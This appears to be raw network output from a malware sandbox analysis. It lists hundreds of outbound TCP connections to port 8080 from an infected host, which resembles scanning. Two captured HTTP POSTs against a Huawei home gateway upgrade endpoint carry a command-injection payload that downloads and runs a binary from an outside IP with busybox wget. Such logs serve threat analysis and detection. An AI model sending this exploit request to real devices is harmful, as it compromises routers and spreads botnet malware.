    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.206.185.122:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.243.182.216:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.145.165.27:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.3.242.14:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.145.255.187:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.13.43.146:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.193.98.86:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.156.57.122:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.98.28.228:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.15.146.65:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.247.2.37:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.198.243.141:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.162.52.161:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.5.222.137:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.160.170.50:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.202.30.98:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.21.243.74:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.137.95.45:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.109.131.182:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.199.12.205:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.44.221.209:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.41.55.183:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.152.131.141:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.176.26.39:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.25.13.127:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.211.233.20:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.186.138.77:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.143.247.220:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.165.216.156:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.140.46.100:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.88.127.224:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.105.250.41:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.74.70.216:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.143.35.143:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.97.94.17:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.57.166.206:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.78.220.38:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.223.213.63:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.242.169.204:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.136.79.46:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.34.172.213:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.247.139.122:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.164.37.61:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.251.150.0:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.61.1.73:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.32.144.245:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.82.181.176:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.254.148.115:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.176.61.190:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.118.88.159:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.157.66.12:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.120.171.131:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.210.235.20:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.227.198.226:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.103.92.139:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.140.251.139:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.89.2.91:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.232.96.245:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.5.62.175:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.193.145.180:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.139.91.49:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.184.154.23:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.161.226.210:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.158.18.209:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.143.228.8:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.150.114.243:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.3.215.200:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.200.31.54:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.231.131.6:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.199.119.250:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.80.215.109:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.128.152.177:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.245.224.80:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.189.203.10:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.205.76.189:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.200.1.58:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.98.219.180:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.119.224.206:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.223.180.132:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.230.192.157:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.152.43.127:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.160.11.89:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.252.223.164:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.197.112.222:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.83.111.156:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.32.89.120:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.175.185.88:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.59.45.83:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.121.119.72:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.125.220.40:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.229.75.79:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.225.112.79:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.110.22.57:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.77.252.187:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.43.165.92:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.255.95.199:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.162.54.234:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.239.41.193:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.193.229.35:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.98.188.241:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.202.206.119:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.75.212.210:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.198.221.72:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.187.109.24:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.156.9.251:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.46.221.79:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.253.3.171:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.109.186.199:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.167.95.27:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.241.252.143:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.32.46.10:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.150.46.14:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.218.179.176:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.176.216.139:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.122.107.200:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.182.151.155:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.105.14.110:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.10.77.114:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.82.83.5:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.126.88.104:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.28.237.205:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.129.10.143:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.29.181.182:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.174.186.117:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.107.13.84:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.85.152.93:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.151.180.179:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.5.171.14:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.34.53.227:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.192.82.251:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.6.231.5:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.92.248.28:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.187.248.182:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.205.96.123:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.217.192.141:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.100.13.0:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.203.245.92:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.1.149.101:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.216.195.67:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.131.124.121:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.218.3.19:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.232.47.227:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.50.78.26:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.151.119.194:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.246.225.0:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.158.86.39:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.76.130.21:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.166.180.21:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.87.50.23:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.117.15.57:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.63.50.46:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.72.56.45:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.194.35.250:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.107.222.241:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.42.29.27:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.81.5.68:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.69.123.208:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.46.132.11:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.242.206.173:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.111.63.173:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.201.46.0:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.152.48.49:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.81.98.239:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.233.49.195:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.210.69.19:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.204.137.12:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.165.135.194:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.161.94.192:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.126.172.154:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.206.11.118:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.178.178.185:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.147.68.230:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.70.119.11:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.33.129.145:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.183.104.76:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.149.159.192:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.156.125.19:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.190.143.83:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.8.16.13:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.141.206.153:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.81.53.128:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.40.82.222:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.196.87.68:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.88.241.246:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.12.28.155:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.143.79.174:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.9.173.51:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.98.80.7:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.135.74.53:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.86.28.175:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.89.138.93:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.204.125.200:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.56.61.61:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.218.188.8:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.112.117.66:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.247.86.144:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.196.116.106:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.246.188.151:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.46.133.147:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.174.225.247:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.99.209.146:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.20.2.94:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.220.116.121:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.218.208.229:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.148.163.21:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.110.148.124:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.93.242.12:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.37.108.95:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.80.141.59:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.79.44.207:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.182.115.36:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.92.216.60:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.140.27.51:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.89.24.248:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.152.121.245:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.236.3.135:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.141.148.110:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.34.188.167:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.203.217.59:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.191.112.164:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.38.89.121:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.190.230.122:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.168.21.248:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.122.180.4:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.117.235.255:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.141.160.191:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.80.6.246:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.210.255.103:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.95.186.237:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.208.53.11:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.232.245.208:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.139.146.100:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.125.189.125:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.70.101.105:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.65.247.171:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.64.178.109:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.155.211.232:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.89.206.146:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.194.163.85:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.172.212.146:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.108.77.44:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.11.95.149:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.234.243.5:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.133.22.130:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.96.119.254:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.207.190.105:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.35.152.158:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.143.136.252:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.44.198.27:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.145.2.231:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.134.102.44:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.228.190.116:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.70.158.112:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.56.180.119:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.52.28.234:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.145.119.130:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.184.119.205:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.153.43.27:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.232.183.140:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.3.10.126:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.31.5.198:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.179.206.100:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.160.229.167:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.104.177.182:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.66.174.180:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.58.234.80:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.81.180.156:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.198.244.197:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.216.253.87:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.145.158.37:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.112.198.164:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.148.115.16:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.92.207.68:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.187.234.85:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.202.235.140:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.158.213.224:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 85.94.205.154:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.217.168.73:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.50.3.211:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.98.61.255:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.114.174.141:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 62.85.148.186:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 31.239.165.71:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.73.165.113:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 94.7.208.28:8080
    Source: global trafficTCP traffic: 192.168.2.23:13030 -> 95.244.38.240:8080
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.62.248.103 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 194.62.248.103 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
